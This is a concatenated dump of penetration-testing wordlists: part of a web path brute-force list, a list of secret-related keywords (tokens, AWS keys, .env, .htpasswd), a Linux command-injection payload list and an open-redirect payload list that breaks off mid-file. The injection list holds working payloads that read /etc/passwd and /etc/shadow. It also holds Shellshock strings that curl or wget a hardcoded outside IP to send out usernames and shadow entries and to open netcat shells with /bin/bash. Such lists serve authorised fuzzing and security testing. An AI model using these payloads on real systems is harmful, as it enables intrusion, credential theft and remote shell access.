4605 | wellcome 4606 | werbung 4607 | wget 4608 | what 4609 | whatever 4610 | whatnot 4611 | whatsnew 4612 | white 4613 | whitepaper 4614 | whitepapers 4615 | who 4616 | whois 4617 | wholesale 4618 | whosonline 4619 | why 4620 | wicket 4621 | wide_search 4622 | widget 4623 | widgets 4624 | wifi 4625 | wii 4626 | wiki 4627 | will 4628 | win 4629 | win32 4630 | windows 4631 | wink 4632 | winnt 4633 | wireless 4634 | wishlist 4635 | with 4636 | wizmysqladmin 4637 | wml 4638 | wolthuis 4639 | word 4640 | wordpress 4641 | work 4642 | workarea 4643 | workflowtasks 4644 | working 4645 | workplace 4646 | works 4647 | workshop 4648 | workshops 4649 | world 4650 | worldpayreturn 4651 | worldwide 4652 | wow 4653 | wp 4654 | wp-admin 4655 | wp-app 4656 | wp-atom 4657 | wp-blog-header 4658 | wp-comments 4659 | wp-commentsrss2 4660 | wp-config 4661 | wp-content 4662 | wp-cron 4663 | wp-dbmanager 4664 | wp-feed 4665 | wp-icludes 4666 | wp-images 4667 | wp-includes 4668 | wp-links-opml 4669 | wp-load 4670 | wp-login 4671 | wp-mail 4672 | wp-pass 4673 | wp-rdf 4674 | wp-register 4675 | wp-rss 4676 | wp-rss2 4677 | wp-settings 4678 | wp-signup 4679 | wp-syntax 4680 | wp-trackback 4681 | wpau-backup 4682 | wpcallback 4683 | wpcontent 4684 | wps 4685 | wrap 4686 | writing 4687 | ws 4688 | ws-client 4689 | ws_ftp 4690 | wsdl 4691 | wss 4692 | wstat 4693 | wstats 4694 | wt 4695 | wtai 4696 | wusage 4697 | wwhelp 4698 | www 4699 | www-sql 4700 | www1 4701 | www2 4702 | www3 4703 | wwwboard 4704 | wwwjoin 4705 | wwwlog 4706 | wwwroot 4707 | wwwstat 4708 | wwwstats 4709 | wwwthreads 4710 | wwwuser 4711 | wysiwyg 4712 | wysiwygpro 4713 | x 4714 | xajax 4715 | xajax_js 4716 | xalan 4717 | xbox 4718 | xcache 4719 | xcart 4720 | xd_receiver 4721 | xdb 4722 | xerces 4723 | xfer 4724 | xhtml 4725 | xlogin 4726 | xls 4727 | xmas 4728 | xml 4729 | xml-rpc 4730 | xmlfiles 4731 | xmlimporter 4732 | xmlrpc 4733 | xmlrpc.php 4734 | xn 4735 | xsl 4736 | xslt 4737 | xsql 4738 | xx 4739 | xxx 4740 | xyz 4741 | xyzzy 4742 | y 4743 | yahoo 4744 | year 4745 | yearly 4746 | yesterday 4747 | yml 4748 | yonetici 4749 | yonetim 4750 | youtube 4751 | yshop 4752 | yt 4753 | yui 4754 | z 4755 | zap 4756 | zboard 4757 | zencart 4758 | zend 4759 | zero 4760 | zeus 4761 | zh 4762 | zh-cn 4763 | zh-tw 4764 | zh_CN 4765 | zh_TW 4766 | zimbra 4767 | zip 4768 | zipfiles 4769 | zips 4770 | zoeken 4771 | zoom 4772 | zope 4773 | zorum 4774 | zt 4775 | ~adm 4776 | ~admin 4777 | ~administrator 4778 | ~amanda 4779 | ~apache 4780 | ~bin 4781 | ~ftp 4782 | ~guest 4783 | ~http 4784 | ~httpd 4785 | ~log 4786 | ~logs 4787 | ~lp 4788 | ~mail 4789 | ~nobody 4790 | ~operator 4791 | ~root 4792 | ~sys 4793 | ~sysadm 4794 | ~sysadmin 4795 | ~test 4796 | ~tmp 4797 | ~user 4798 | ~webmaster 4799 | ~www 4800 | -------------------------------------------------------------------------------- /wordlists/keywords.txt: -------------------------------------------------------------------------------- 1 | API 2 | Token 3 | .json 4 | js 5 | File 6 | SQL 7 | key 8 | path 9 | verify 10 | false/true 11 | Role 12 | Permissions 13 | isCheck 14 | Difference between Request and Response Keywords 15 | Error 16 | Success 17 | Verified 18 | credentials 19 | Auth 20 | validate 21 | Fetch 22 | Action 23 | retrieve 24 | Process 25 | Success 26 | unsccess 27 | username 28 | userID 29 | email 30 | token 31 | auth_key 32 | password 33 | credentials 34 | pwd 35 | github_token 36 | login 37 | FTP 38 | aws_key 39 | secret_key 40 | API_key 41 | Ip 42 | Port 43 | API 44 | Secret 45 | connectionstring 46 | JDBC 47 | ssh2_auth_password 48 | send_keys or send 49 | keys 50 | Basic 51 | .php 52 | Path 53 | Url 54 | S3 55 | Aws 56 | Private 57 | Login 58 | Cpanel 59 | Cc 60 | DB 61 | isTrue 62 | isPublished 63 | Manager 64 | Store 65 | Flag 66 | Action 67 | Todo 68 | Upload 69 | State 70 | Creds 71 | .env 72 | .htpasswd 73 | .htuser 74 | Role 75 | Permission 76 | Allowed 77 | Plan 78 | UID 79 | user_id 80 | Secret 81 | confidential 82 | token 83 | Access_token 84 | Access_key 85 | Id 86 | Json 87 | auth_token 88 | -------------------------------------------------------------------------------- /wordlists/linux-cmd-injection.txt: -------------------------------------------------------------------------------- 1 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"--> 2 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"--> 3 | <!--#exec%20cmd="/usr/bin/id;--> 4 | <!--#exec%20cmd="/usr/bin/id;--> 5 | /index.html|id| 6 | ;id; 7 | ;id 8 | ;netstat -a; 9 | ;system('cat%20/etc/passwd') 10 | ;id; 11 | |id 12 | |/usr/bin/id 13 | |id| 14 | |/usr/bin/id| 15 | ||/usr/bin/id| 16 | |id; 17 | ||/usr/bin/id; 18 | ;id| 19 | ;|/usr/bin/id| 20 | \n/bin/ls -al\n 21 | \n/usr/bin/id\n 22 | \nid\n 23 | \n/usr/bin/id; 24 | \nid; 25 | \n/usr/bin/id| 26 | \nid| 27 | ;/usr/bin/id\n 28 | ;id\n 29 | |usr/bin/id\n 30 | |nid\n 31 | `id` 32 | `/usr/bin/id` 33 | a);id 34 | a;id 35 | a);id; 36 | a;id; 37 | a);id| 38 | a;id| 39 | a)|id 40 | a|id 41 | a)|id; 42 | a|id 43 | |/bin/ls -al 44 | a);/usr/bin/id 45 | a;/usr/bin/id 46 | a);/usr/bin/id; 47 | a;/usr/bin/id; 48 | a);/usr/bin/id| 49 | a;/usr/bin/id| 50 | a)|/usr/bin/id 51 | a|/usr/bin/id 52 | a)|/usr/bin/id; 53 | a|/usr/bin/id 54 | ;system('cat%20/etc/passwd') 55 | ;system('id') 56 | ;system('/usr/bin/id') 57 | %0Acat%20/etc/passwd 58 | %0A/usr/bin/id 59 | %0Aid 60 | %0A/usr/bin/id%0A 61 | %0Aid%0A 62 | & ping -i 30 127.0.0.1 & 63 | & ping -n 30 127.0.0.1 & 64 | %0a ping -i 30 127.0.0.1 %0a 65 | `ping 127.0.0.1` 66 | | id 67 | & id 68 | ; id 69 | %0a id %0a 70 | `id` 71 | $;/usr/bin/id 72 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" 73 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`" 74 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`" 75 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`" 76 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`" 77 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`" 78 | () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5" 79 | () { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6" 80 | () { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1" 81 | () { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7" 82 | () { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3" 83 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8" 84 | () { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9" 85 | () { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6" 86 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`" 87 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`" 88 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`" 89 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`" 90 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`" 91 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`" 92 | () { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4" 93 | cat /etc/hosts 94 | $(`cat /etc/passwd`) 95 | cat /etc/passwd 96 | %0Acat%20/etc/passwd 97 | {{ get_user_file("/etc/passwd") }} 98 | 99 | 100 | 101 | system('cat /etc/passwd'); 102 | 103 | -------------------------------------------------------------------------------- /wordlists/open-redirect.txt: -------------------------------------------------------------------------------- 1 | http:http:evil[.]com 2 | http:/evil%252ecom 3 | ///www.x.com@evil.com 4 | https://google.comğ.target.com 5 | /%09/example.com 6 | /%2f%2fexample.com 7 | /%2f%2f%2fbing.com%2f%3fwww.omise.co 8 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ 9 | /%5cexample.com 10 | /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 11 | /.example.com 12 | //%09/example.com 13 | //%5cexample.com 14 | ///%09/example.com 15 | ///%5cexample.com 16 | ////%09/example.com 17 | ////%5cexample.com 18 | /////example.com 19 | /////example.com/ 20 | ////\;@example.com 21 | ////example.com/ 22 | ////example.com/%2e%2e 23 | ////example.com/%2e%2e%2f 24 | ////example.com/%2f%2e%2e 25 | ////example.com/%2f.. 26 | ////example.com// 27 | ///\;@example.com 28 | ///example.com 29 | ///example.com/ 30 | //google.com/%2f.. 31 | //www.whitelisteddomain.tld@google.com/%2f.. 32 | ///google.com/%2f.. 33 | ///www.whitelisteddomain.tld@google.com/%2f.. 34 | ////google.com/%2f.. 35 | ////www.whitelisteddomain.tld@google.com/%2f.. 36 | https://google.com/%2f.. 37 | https://www.whitelisteddomain.tld@google.com/%2f.. 38 | /https://google.com/%2f.. 39 | /https://www.whitelisteddomain.tld@google.com/%2f.. 40 | //www.google.com/%2f%2e%2e 41 | //www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 42 | ///www.google.com/%2f%2e%2e 43 | ///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 44 | ////www.google.com/%2f%2e%2e 45 | ////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 46 | https://www.google.com/%2f%2e%2e 47 | https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 48 | /https://www.google.com/%2f%2e%2e 49 | /https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 50 | //google.com/ 51 | //www.whitelisteddomain.tld@google.com/ 52 | ///google.com/ 53 | ///www.whitelisteddomain.tld@google.com/ 54 | ////google.com/ 55 | ////www.whitelisteddomain.tld@google.com/ 56 | https://google.com/ 57 | https://www.whitelisteddomain.tld@google.com/ 58 | /https://google.com/ 59 | /https://www.whitelisteddomain.tld@google.com/ 60 | //google.com// 61 | //www.whitelisteddomain.tld@google.com// 62 | ///google.com// 63 | ///www.whitelisteddomain.tld@google.com// 64 | ////google.com// 65 | ////www.whitelisteddomain.tld@google.com// 66 | https://google.com// 67 | https://www.whitelisteddomain.tld@google.com// 68 | //https://google.com// 69 | //https://www.whitelisteddomain.tld@google.com// 70 | //www.google.com/%2e%2e%2f 71 | //www.whitelisteddomain.tld@www.google.com/%2e%2e%2f 72 | ///www.google.com/%2e%2e%2f 73 | ///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f 74 | ////www.google.com/%2e%2e%2f 75 | ////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f 76 | https://www.google.com/%2e%2e%2f 77 | https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f 78 | //https://www.google.com/%2e%2e%2f 79 | //https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f 80 | ///www.google.com/%2e%2e 81 | ///www.whitelisteddomain.tld@www.google.com/%2e%2e 82 | ////www.google.com/%2e%2e 83 | ////www.whitelisteddomain.tld@www.google.com/%2e%2e 84 | https:///www.google.com/%2e%2e 85 | https:///www.whitelisteddomain.tld@www.google.com/%2e%2e 86 | //https:///www.google.com/%2e%2e 87 | //www.whitelisteddomain.tld@https:///www.google.com/%2e%2e 88 | /https://www.google.com/%2e%2e 89 | /https://www.whitelisteddomain.tld@www.google.com/%2e%2e 90 | ///www.google.com/%2f%2e%2e 91 | ///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 92 | ////www.google.com/%2f%2e%2e 93 | ////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 94 | https:///www.google.com/%2f%2e%2e 95 | https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 96 | /https://www.google.com/%2f%2e%2e 97 | /https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 98 | /https:///www.google.com/%2f%2e%2e 99 | /https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e 100 | /%09/google.com 101 | /%09/www.whitelisteddomain.tld@google.com 102 | //%09/google.com 103 | //%09/www.whitelisteddomain.tld@google.com 104 | ///%09/google.com 105 | ///%09/www.whitelisteddomain.tld@google.com 106 | ////%09/google.com 107 | ////%09/www.whitelisteddomain.tld@google.com 108 | https://%09/google.com 109 | https://%09/www.whitelisteddomain.tld@google.com 110 | /%5cgoogle.com 111 | /%5cwww.whitelisteddomain.tld@google.com 112 | //%5cgoogle.com 113 | //%5cwww.whitelisteddomain.tld@google.com 114 | ///%5cgoogle.com 115 | ///%5cwww.whitelisteddomain.tld@google.com 116 | ////%5cgoogle.com 117 | ////%5cwww.whitelisteddomain.tld@google.com 118 | https://%5cgoogle.com 119 | https://%5cwww.whitelisteddomain.tld@google.com 120 | /https://%5cgoogle.com 121 | /https://%5cwww.whitelisteddomain.tld@google.com 122 | https://google.com 123 | https://www.whitelisteddomain.tld@google.com 124 | javascript:alert(1); 125 | javascript:alert(1) 126 | //javascript:alert(1); 127 | /javascript:alert(1); 128 | //javascript:alert(1) 129 | /javascript:alert(1) 130 | /%5cjavascript:alert(1); 131 | /%5cjavascript:alert(1) 132 | //%5cjavascript:alert(1); 133 | //%5cjavascript:alert(1) 134 | /%09/javascript:alert(1); 135 | /%09/javascript:alert(1) 136 | java%0d%0ascript%0d%0a:alert(0) 137 | //google.com 138 | https:google.com 139 | //google%E3%80%82com 140 | \/\/google.com/ 141 | /\/google.com/ 142 | //google%00.com 143 | https://www.whitelisteddomain.tld/https://www.google.com/ 144 | ";alert(0);// 145 | javascript://www.whitelisteddomain.tld?%a0alert%281%29 146 | http://0xd8.0x3a.0xd6.0xce 147 | http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce 148 | http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 149 | http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 150 | http://0xd83ad6ce 151 | http://www.whitelisteddomain.tld@0xd83ad6ce 152 | http://3H6k7lIAiqjfNeN@0xd83ad6ce 153 | http://XY>.7d8T\205pZM@0xd83ad6ce 154 | http://3627734734 155 | http://www.whitelisteddomain.tld@3627734734 156 | http://3H6k7lIAiqjfNeN@3627734734 157 | http://XY>.7d8T\205pZM@3627734734 158 | http://472.314.470.462 159 | http://www.whitelisteddomain.tld@472.314.470.462 160 | http://3H6k7lIAiqjfNeN@472.314.470.462 161 | http://XY>.7d8T\205pZM@472.314.470.462 162 | http://0330.072.0326.0316 163 | http://www.whitelisteddomain.tld@0330.072.0326.0316 164 | http://3H6k7lIAiqjfNeN@0330.072.0326.0316 165 | http://XY>.7d8T\205pZM@0330.072.0326.0316 166 | http://00330.00072.0000326.00000316 167 | http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 168 | http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 169 | http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 170 | http://[::216.58.214.206] 171 | http://www.whitelisteddomain.tld@[::216.58.214.206] 172 | http://3H6k7lIAiqjfNeN@[::216.58.214.206] 173 | http://XY>.7d8T\205pZM@[::216.58.214.206] 174 | http://[::ffff:216.58.214.206] 175 | http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] 176 | http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 177 | http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] 178 | http://0xd8.072.54990 179 | http://www.whitelisteddomain.tld@0xd8.072.54990 180 | http://3H6k7lIAiqjfNeN@0xd8.072.54990 181 | http://XY>.7d8T\205pZM@0xd8.072.54990 182 | http://0xd8.3856078 183 | http://www.whitelisteddomain.tld@0xd8.3856078 184 | http://3H6k7lIAiqjfNeN@0xd8.3856078 185 | http://XY>.7d8T\205pZM@0xd8.3856078 186 | http://00330.3856078 187 | http://www.whitelisteddomain.tld@00330.3856078 188 | http://3H6k7lIAiqjfNeN@00330.3856078 189 | http://XY>.7d8T\205pZM@00330.3856078 190 | http://00330.0x3a.54990 191 | http://www.whitelisteddomain.tld@00330.0x3a.54990 192 | http://3H6k7lIAiqjfNeN@00330.0x3a.54990 193 | http://XY>.7d8T\205pZM@00330.0x3a.54990 194 | http:0xd8.0x3a.0xd6.0xce 195 | http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce 196 | http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 197 | http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 198 | http:0xd83ad6ce 199 | http:www.whitelisteddomain.tld@0xd83ad6ce 200 | http:3H6k7lIAiqjfNeN@0xd83ad6ce 201 | http:XY>.7d8T\205pZM@0xd83ad6ce 202 | http:3627734734 203 | http:www.whitelisteddomain.tld@3627734734 204 | http:3H6k7lIAiqjfNeN@3627734734 205 | http:XY>.7d8T\205pZM@3627734734 206 | http:472.314.470.462 207 | http:www.whitelisteddomain.tld@472.314.470.462 208 | http:3H6k7lIAiqjfNeN@472.314.470.462 209 | http:XY>.7d8T\205pZM@472.314.470.462 210 | http:0330.072.0326.0316 211 | http:www.whitelisteddomain.tld@0330.072.0326.0316 212 | http:3H6k7lIAiqjfNeN@0330.072.0326.0316 213 | http:XY>.7d8T\205pZM@0330.072.0326.0316 214 | http:00330.00072.0000326.00000316 215 | http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 216 | http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 217 | http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 218 | http:[::216.58.214.206] 219 | http:www.whitelisteddomain.tld@[::216.58.214.206] 220 | http:3H6k7lIAiqjfNeN@[::216.58.214.206] 221 | http:XY>.7d8T\205pZM@[::216.58.214.206] 222 | http:[::ffff:216.58.214.206] 223 | http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] 224 | http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] 225 | http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] 226 | http:0xd8.072.54990 227 | http:www.whitelisteddomain.tld@0xd8.072.54990 228 | http:3H6k7lIAiqjfNeN@0xd8.072.54990 229 | http:XY>.7d8T\205pZM@0xd8.072.54990 230 | http:0xd8.3856078 231 | http:www.whitelisteddomain.tld@0xd8.3856078 232 | http:3H6k7lIAiqjfNeN@0xd8.3856078 233 | http:XY>.7d8T\205pZM@0xd8.3856078 234 | http:00330.3856078 235 | http:www.whitelisteddomain.tld@00330.3856078 236 | http:3H6k7lIAiqjfNeN@00330.3856078 237 | http:XY>.7d8T\205pZM@00330.3856078 238 | http:00330.0x3a.54990 239 | http:www.whitelisteddomain.tld@00330.0x3a.54990 240 | http:3H6k7lIAiqjfNeN@00330.0x3a.54990 241 | http:XY>.7d8T\205pZM@00330.0x3a.54990 242 | 〱google.com 243 | 〵google.com 244 | ゝgoogle.com 245 | ーgoogle.com 246 | ーgoogle.com 247 | /〱google.com 248 | /〵google.com 249 | /ゝgoogle.com 250 | /ーgoogle.com 251 | /ーgoogle.com 252 | %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d 253 | http://%67%6f%6f%67%6c%65%2e%63%6f%6d 254 | <>javascript:alert(1); 255 | <>//google.com 256 | //google.com\@www.whitelisteddomain.tld 257 | https://:@google.com\@www.whitelisteddomain.tld 258 | \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) 259 | \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) 260 | ja\nva\tscript\r:alert(1) 261 | \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) 262 | \152\141\166\141\163\143\162\151\160\164\072alert(1) 263 | http://google.com:80#@www.whitelisteddomain.tld/ 264 | http://google.com:80?@www.whitelisteddomain.tld/ 265 | ///example.com/%2e%2e 266 | ///example.com/%2e%2e%2f 267 | ///example.com/%2f%2e%2e 268 | ///example.com/%2f.. 269 | ///example.com// 270 | //example.com 271 | //example.com/ 272 | //example.com/%2e%2e 273 | //example.com/%2e%2e%2f 274 | //example.com/%2f%2e%2e 275 | //example.com/%2f.. 276 | //example.com// 277 | //google%00.com 278 | //google%E3%80%82com 279 | //https:///example.com/%2e%2e 280 | //https://example.com/%2e%2e%2f 281 | //https://example.com// 282 | /<>//example.com 283 | /?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 284 | /?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com 285 | /?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 286 | /\/\/example.com/ 287 | /\/example.com/ 288 | /example.com/%2f%2e%2e 289 | /http://%67%6f%6f%67%6c%65%2e%63%6f%6d 290 | /http://example.com 291 | /http:/example.com 292 | /https:/%5cexample.com/ 293 | /https://%09/example.com 294 | /https://%5cexample.com 295 | /https:///example.com/%2e%2e 296 | /https:///example.com/%2f%2e%2e 297 | /https://example.com 298 | /https://example.com/ 299 | /https://example.com/%2e%2e 300 | /https://example.com/%2e%2e%2f 301 | /https://example.com/%2f%2e%2e 302 | /https://example.com/%2f.. 303 | /https://example.com// 304 | /https:example.com 305 | /redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com 306 | /redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com 307 | /redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com 308 | 309 | //%2fxgoogle.com 310 | /ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org 311 | //localdomain.pw/%2f.. 312 | //www.whitelisteddomain.tld@localdomain.pw/%2f.. 313 | ///localdomain.pw/%2f.. 314 | ///www.whitelisteddomain.tld@localdomain.pw/%2f.. 315 | ////localdomain.pw/%2f.. 316 | ////www.whitelisteddomain.tld@localdomain.pw/%2f.. 317 | https://localdomain.pw/%2f.. 318 | https://www.whitelisteddomain.tld@localdomain.pw/%2f.. 319 | /https://localdomain.pw/%2f.. 320 | /https://www.whitelisteddomain.tld@localdomain.pw/%2f.. 321 | //localdomain.pw/%2f%2e%2e 322 | //www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 323 | ///localdomain.pw/%2f%2e%2e 324 | ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 325 | ////localdomain.pw/%2f%2e%2e 326 | ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 327 | https://localdomain.pw/%2f%2e%2e 328 | https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 329 | /https://localdomain.pw/%2f%2e%2e 330 | /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 331 | //localdomain.pw/ 332 | //www.whitelisteddomain.tld@localdomain.pw/ 333 | ///localdomain.pw/ 334 | ///www.whitelisteddomain.tld@localdomain.pw/ 335 | ////localdomain.pw/ 336 | ////www.whitelisteddomain.tld@localdomain.pw/ 337 | https://localdomain.pw/ 338 | https://www.whitelisteddomain.tld@localdomain.pw/ 339 | /https://localdomain.pw/ 340 | /https://www.whitelisteddomain.tld@localdomain.pw/ 341 | //localdomain.pw// 342 | //www.whitelisteddomain.tld@localdomain.pw// 343 | ///localdomain.pw// 344 | ///www.whitelisteddomain.tld@localdomain.pw// 345 | ////localdomain.pw// 346 | ////www.whitelisteddomain.tld@localdomain.pw// 347 | https://localdomain.pw// 348 | https://www.whitelisteddomain.tld@localdomain.pw// 349 | //https://localdomain.pw// 350 | //https://www.whitelisteddomain.tld@localdomain.pw// 351 | //localdomain.pw/%2e%2e%2f 352 | //www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f 353 | ///localdomain.pw/%2e%2e%2f 354 | ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f 355 | ////localdomain.pw/%2e%2e%2f 356 | ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f 357 | https://localdomain.pw/%2e%2e%2f 358 | https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f 359 | //https://localdomain.pw/%2e%2e%2f 360 | //https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e%2f 361 | ///localdomain.pw/%2e%2e 362 | ///www.whitelisteddomain.tld@localdomain.pw/%2e%2e 363 | ////localdomain.pw/%2e%2e 364 | ////www.whitelisteddomain.tld@localdomain.pw/%2e%2e 365 | https:///localdomain.pw/%2e%2e 366 | https:///www.whitelisteddomain.tld@localdomain.pw/%2e%2e 367 | //https:///localdomain.pw/%2e%2e 368 | //www.whitelisteddomain.tld@https:///localdomain.pw/%2e%2e 369 | /https://localdomain.pw/%2e%2e 370 | /https://www.whitelisteddomain.tld@localdomain.pw/%2e%2e 371 | ///localdomain.pw/%2f%2e%2e 372 | ///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 373 | ////localdomain.pw/%2f%2e%2e 374 | ////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 375 | https:///localdomain.pw/%2f%2e%2e 376 | https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 377 | /https://localdomain.pw/%2f%2e%2e 378 | /https://www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 379 | /https:///localdomain.pw/%2f%2e%2e 380 | /https:///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e 381 | /%09/localdomain.pw 382 | /%09/www.whitelisteddomain.tld@localdomain.pw 383 | //%09/localdomain.pw 384 | //%09/www.whitelisteddomain.tld@localdomain.pw 385 | ///%09/localdomain.pw 386 | ///%09/www.whitelisteddomain.tld@localdomain.pw 387 | ////%09/localdomain.pw 388 | ////%09/www.whitelisteddomain.tld@localdomain.pw 389 | https://%09/localdomain.pw 390 | https://%09/www.whitelisteddomain.tld@localdomain.pw 391 | /%5clocaldomain.pw 392 | /%5cwww.whitelisteddomain.tld@localdomain.pw 393 | //%5clocaldomain.pw 394 | //%5cwww.whitelisteddomain.tld@localdomain.pw 395 | ///%5clocaldomain.pw 396 | ///%5cwww.whitelisteddomain.tld@localdomain.pw 397 | ////%5clocaldomain.pw 398 | ////%5cwww.whitelisteddomain.tld@localdomain.pw 399 | https://%5clocaldomain.pw 400 | https://%5cwww.whitelisteddomain.tld@localdomain.pw 401 | /https://%5clocaldomain.pw 402 | /https://%5cwww.whitelisteddomain.tld@localdomain.pw 403 | https://localdomain.pw 404 | https://www.whitelisteddomain.tld@localdomain.pw 405 | javascript:alert(1); 406 | javascript:alert(1) 407 | //javascript:alert(1); 408 | /javascript:alert(1); 409 | //javascript:alert(1) 410 | /javascript:alert(1) 411 | /%5cjavascript:alert(1); 412 | /%5cjavascript:alert(1) 413 | //%5cjavascript:alert(1); 414 | //%5cjavascript:alert(1) 415 | /%09/javascript:alert(1); 416 | /%09/javascript:alert(1) 417 | java%0d%0ascript%0d%0a:alert(0) 418 | //localdomain.pw 419 | https:localdomain.pw 420 | //localdomain%E3%80%82pw 421 | \/\/localdomain.pw/ 422 | /\/localdomain.pw/ 423 | /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ 424 | //localdomain%00.pw 425 | https://www.whitelisteddomain.tld/https://localdomain.pw/ 426 | ";alert(0);// 427 | javascript://www.whitelisteddomain.tld?%a0alert%281%29 428 | http://0xd8.0x3a.0xd6.0xce 429 | http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce 430 | http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce 431 | http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce 432 | http://0xd83ad6ce 433 | http://www.whitelisteddomain.tld@0xd83ad6ce 434 | http://3H6k7lIAiqjfNeN@0xd83ad6ce 435 | http://XY>.7d8T\205pZM@0xd83ad6ce 436 | http://3627734734 437 | http://www.whitelisteddomain.tld@3627734734 438 | http://3H6k7lIAiqjfNeN@3627734734 439 | http://XY>.7d8T\205pZM@3627734734 440 | http://472.314.470.462 441 | http://www.whitelisteddomain.tld@472.314.470.462 442 